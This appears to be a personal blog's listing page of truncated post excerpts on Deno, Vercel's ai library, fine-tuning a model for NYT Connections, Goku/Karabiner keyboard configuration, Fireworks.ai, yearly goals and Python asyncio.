I tried out Deno for the first time. Deno bills itself as

the most productive, secure, and performant JavaScript runtime for the modern programmer

Given my experience with it so far, I think it may have a case. One thing I immediately appreciated about Deno was how quickly I could go from zero to running code. It’s one of the things I like about Python that has kept me coming back despite a number of other shortcomings. Deno integrates easily into VS Code (Cursor) with the vscode_deno plugin. I found this plugin with a quick search in the marketplace.

Disclaimer: I am not a security expert or a security professional.

I’ve tried out many new AI/LLM libraries in the past year. Many of these are written in Python. While trying out new and exciting software is a lot of fun, it’s also important to be mindful about what code you allow to run on your system. Even if code is open source, it’s still possible that the cool open source library you installed includes code like

Edit (2024-07-21): Vercel has updated the ai package to use different abstractions than the examples below. Consider reading their docs first before using the example below, which is out of date.

Vercel has a library called ai, that is useful for building language model chat applications. I used it to help build Write Partner The library has two main components:

  • A backend API that is called by a frontend app that streams language model responses
  • A hook (in React) that provides access to the chat, its messages and an API to fetch completions

When designing Write Partner, I started the chat session with the following messages

I started playing the NYTimes word game “Connections” recently, by the recommendation of a few friends. It has the type of freshness that Wordle lost for me a long time ago. After playing Connections for a few days, I wondered if an OpenAI language model could solve the game (the objective is to group the 16 words into 4 categories of 4 words). I tried with gpt-4-32k and gpt-4-1106-preview, tweaking prompts for a few hours and wasn’t able to make much progress. It’s certainly possible prompt engineering alone could solve this problem, but it wasn’t easy for me for find a path forward. I imagine it will involve a bit of creativity. I decided this was as good a time as any to try and fine tune a model to do a thing I couldn’t easily get it to do with prompts.

Goku has a concept called a simlayer. A simlayer allows you to press any single key on the keyboard, then any second key while holding the first and trigger an arbitrary action as a result. I’m going to write a karabiner.edn config that opens Firefox when you press .+f.

{:simlayers {:launch-mode {:key :period}},
 :templates {:open-app "open -a \"%s\""},
 :main
 [{:des "launch mode",
   :rules [:launch-mode [:f [:open-app "Firefox"]]]}]}
❯ goku
Done!

To start, we define a simlayer for the period key. We will reference this layer when we define our rules. Next we define a template. Each entry in :templates is a templated shell command that can run when a rule is satisfied. Finally, we define the “launch mode” rule in :main. We can call it anything we want, so I chose “launch mode”. Now let’s breakdown the rule

Karabiner is a keyboard customizer for macOS. I’ve used it for a while to map my caps lock key to cmd + ctrl + option + shift. This key combination is sometimes called a hyper key. With this keyboard override, I use other programs like Hammerspoon and Alfred to do things like toggle apps and open links. Karabiner provides an out-of-the-box, predefined rule to perform this complex modification. I’ve used this approach for a while but recently learned about Goku which adds a lot of additional functionality to Karabiner using Clojure’s extensible data notation (edn) to declaratively configure Karabiner.

I’ve starting playing around with Fireworks.ai to run inference using open source language models with an API. Fireworks’ product is the best I’ve come across for this use case. While Fireworks has their own client, I wanted to try and use the OpenAI Python SDK compatibility approach, since I have a lot of code that uses the OpenAI SDK. It looks like Fireworks’ documented approach no longer works since OpenAI published version 1.0.0. I got this error message:

At the beginning of 2023, I set some goals for myself. Here are those goals and how the year turned out.

Learn a new word each week (50%)

Clear and effective communication is important to me. My thought process was that I could improve as a communicator if I further developed my vocabulary. I also find it particularly satisfying to conjure the perfect word to describe a situation, experience, etc. Each Monday, I would find a new word and record it, it’s part of speech and definition in Obsidian. Periodically, throughout the week, I would review the new word and all previous words using spaced repetition. This approach was relatively effective at first, but not so effective over the year. In total, I learned 24 new words. About halfway through the year, I would get a reminder on Monday to add a new word to the list, and the timing was bad. I would put it off, then I fell behind and never caught back up. I could have changed up when I scheduled this reminder, but I didn’t. I’m not sure if I will try something like this again. I like the prospect of learning new words, but I think I’d prefer to do so less is a rote memorization kind of way and more in a “search and discover cool words” kind of way.

In a previous note, I discussed running coroutines in a non-blocking manner using gather. This approach works well when you have a known number of coroutines that you want to run in a non-blocking manner. However, if you have tens, hundreds, or more tasks, especially when network calls are involved, it can be important to limit concurrency. We can use a semaphore to limit the number of coroutines that are running at once by blocking until other coroutines have finished executing.

Python coroutines allow for asynchronous programming in a language that earlier in its history, has only supported synchronous execution. I’ve previously compared taking a synchronous approach in Python to a parallel approach in Go using channels. If you’re familiar with async/await in JavaScript, Python’s syntax will look familiar. Python’s event loop allows coroutines to yield control back to the loop, awaiting their turn to resume execution, which can lead to more efficient use of resources. Using coroutines in Python is different from JavaScript because they can easily or even accidentally be intermingled with synchronously executing functions. Doing this can produce some unexpected results, such as blocking the event loop and preventing other tasks from running concurrently.